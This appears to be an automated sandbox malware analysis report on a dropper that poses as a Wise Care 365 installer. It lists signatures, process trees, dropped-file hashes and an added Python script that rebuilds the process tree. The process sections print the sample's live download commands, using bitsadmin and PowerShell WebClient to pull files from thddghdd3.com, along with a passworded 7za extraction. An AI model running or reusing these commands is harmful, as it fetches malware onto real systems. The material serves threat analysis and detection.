Malware Analysis Report

2024-10-16 05:00

Sample ID 240726-ffz1saxcqn
Target 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe
SHA256 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Tags: discovery, dropper, execution
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da

Threat Level: Known bad

The file 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe was found to be: Known bad.

Malicious Activity Summary

Tags: discovery, dropper, execution

Download via BitsAdmin

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-26 04:49

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-26 04:49

Reported

2024-07-26 04:52

Platform

win7-20240704-en

Max time kernel

148s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

Signatures

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A | 2
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A | 31

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Count
PID 2920 wrote to memory of 1284 | N/A | C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | 7
PID 1284 wrote to memory of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | C:\Windows\SysWOW64\cmd.exe | 4
PID 1284 wrote to memory of 544 | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | C:\Windows\SysWOW64\cmd.exe | 4
PID 2264 wrote to memory of 1448 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\bitsadmin.exe | 4
PID 544 wrote to memory of 2160 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | 4
PID 544 wrote to memory of 2700 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\ProgramData\ConsoleApp\7za.exe | 4
PID 544 wrote to memory of 1908 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe | 4
PID 1284 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe | 7
PID 2688 wrote to memory of 1832 | N/A | C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | 7

Processes

C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$C0150,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$301D2,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | thddghdd3.com | udp
US | 8.8.8.8:53 | thddghdd3.com | udp

Files

memory/2920-0-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/2920-2-0x0000000000401000-0x00000000004A9000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

memory/1284-12-0x0000000000400000-0x000000000067B000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

memory/2920-57-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/1284-58-0x0000000000400000-0x000000000067B000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

memory/2688-66-0x0000000000400000-0x0000000000417000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

memory/1832-84-0x0000000000690000-0x00000000006A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

memory/1832-90-0x0000000000670000-0x0000000000671000-memory.dmp

memory/1832-88-0x00000000070E0000-0x00000000073FA000-memory.dmp

memory/1832-91-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-93-0x00000000006B0000-0x00000000006B1000-memory.dmp

memory/1832-94-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-92-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-95-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-96-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1832-97-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-98-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-99-0x00000000006D0000-0x00000000006D1000-memory.dmp

memory/1832-100-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-102-0x0000000001E90000-0x0000000001E91000-memory.dmp

memory/1832-101-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-103-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-104-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-105-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1832-106-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-107-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-111-0x0000000007550000-0x0000000007551000-memory.dmp

memory/1832-110-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-109-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-108-0x0000000007540000-0x0000000007541000-memory.dmp

memory/1832-112-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-113-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-114-0x0000000007560000-0x0000000007561000-memory.dmp

memory/1832-115-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-116-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-118-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-119-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-133-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-145-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-144-0x0000000007600000-0x0000000007601000-memory.dmp

memory/1832-143-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-142-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-141-0x00000000075F0000-0x00000000075F1000-memory.dmp

memory/1832-140-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-139-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-138-0x00000000075E0000-0x00000000075E1000-memory.dmp

memory/1832-137-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-136-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-135-0x00000000075D0000-0x00000000075D1000-memory.dmp

memory/1832-134-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-132-0x00000000075C0000-0x00000000075C1000-memory.dmp

memory/1832-131-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-130-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-129-0x00000000075B0000-0x00000000075B1000-memory.dmp

memory/1832-128-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-127-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-126-0x00000000075A0000-0x00000000075A1000-memory.dmp

memory/1832-125-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-124-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-123-0x0000000007590000-0x0000000007591000-memory.dmp

memory/1832-122-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-121-0x0000000007400000-0x0000000007540000-memory.dmp

memory/1832-120-0x0000000007580000-0x0000000007581000-memory.dmp

memory/1832-117-0x0000000007570000-0x0000000007571000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-26 04:49

Reported

2024-07-26 04:52

Platform

win10v2004-20240709-en

Max time kernel

142s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

Signatures

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A | 2
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A | 60

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1684 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp (3 identical rows)
PID 3960 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe (3 identical rows)
PID 3960 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe (3 identical rows)
PID 2984 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)
PID 228 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe (3 identical rows)
PID 2984 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe (3 identical rows)
PID 2984 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe (3 identical rows)
PID 3960 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe (3 identical rows)
PID 5088 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp (3 identical rows)
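Each row in the WriteProcessMemory table pairs a parent PID with a child it wrote into, and in this report those pairs follow the process-creation chain: the submitted .exe is an installer stub that unpacks a .tmp into an is-XXXXX.tmp directory and runs it with the /SL5= switch (Inno Setup setup-loader conventions), the .tmp launches two cmd.exe instances for the batch files under C:\ProgramData\ConsoleApp, and finally the bundled Wise Care 365 installer. The script below is an added example, not part of the sandbox report, that rebuilds that tree from the rows as listed in the table (one row per parent/child pair); the function names are its own.

```python
import re
from collections import defaultdict

# Rows copied from the "Suspicious use of WriteProcessMemory" table of this report,
# one per distinct parent/child pair (the sandbox logged each pair three times).
WPM_ROWS = r"""
PID 1684 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
PID 3960 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2984 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2984 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3960 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
PID 5088 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp
"""

# Both paths start with "C:\", and neither contains " C:\", so a non-greedy first
# group followed by " C:\" splits process from target even when names contain spaces.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\.*?) (C:\\.*)$")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def build_tree(rows_text):
    """Map every PID to its image path and every parent PID to its children, in log order."""
    names, children, seen = {}, defaultdict(list), set()
    for line in rows_text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ppid, cpid, pimg, cimg = int(m[1]), int(m[2]), m[3], m[4]
        names.setdefault(ppid, pimg)
        names.setdefault(cpid, cimg)
        if (ppid, cpid) not in seen:  # one edge per parent/child pair
            seen.add((ppid, cpid))
            children[ppid].append(cpid)
    all_children = {c for cs in children.values() for c in cs}
    roots = [p for p in names if p not in all_children]
    return names, dict(children), roots


def render(names, children, pid, depth=0):
    """Indented text tree rooted at pid."""
    lines = ["  " * depth + f"{pid} {basename(names[pid])}"]
    for c in children.get(pid, []):
        lines.extend(render(names, children, c, depth + 1))
    return lines


def lineage(names, children, pid):
    """Image names from the root down to pid, e.g. to answer 'what launched bitsadmin?'."""
    parent = {c: p for p, cs in children.items() for c in cs}
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [basename(names[p]) for p in reversed(chain)]


if __name__ == "__main__":
    names, children, roots = build_tree(WPM_ROWS)
    for r in roots:
        print("\n".join(render(names, children, r)))
    print(" -> ".join(lineage(names, children, 3076)))
```

Rendering the tree shows the split at PID 3960: one cmd.exe branch ends in bitsadmin.exe, the other in powershell.exe, 7za.exe and timeout.exe, and the Wise Care installer chain (5088 and 928) hangs off the same parent, which is why the report's later signature rows are dominated by the decoy installer's own window activity.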

Processes

C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe

"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$40210,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\Windows\SysWOW64\bitsadmin.exe

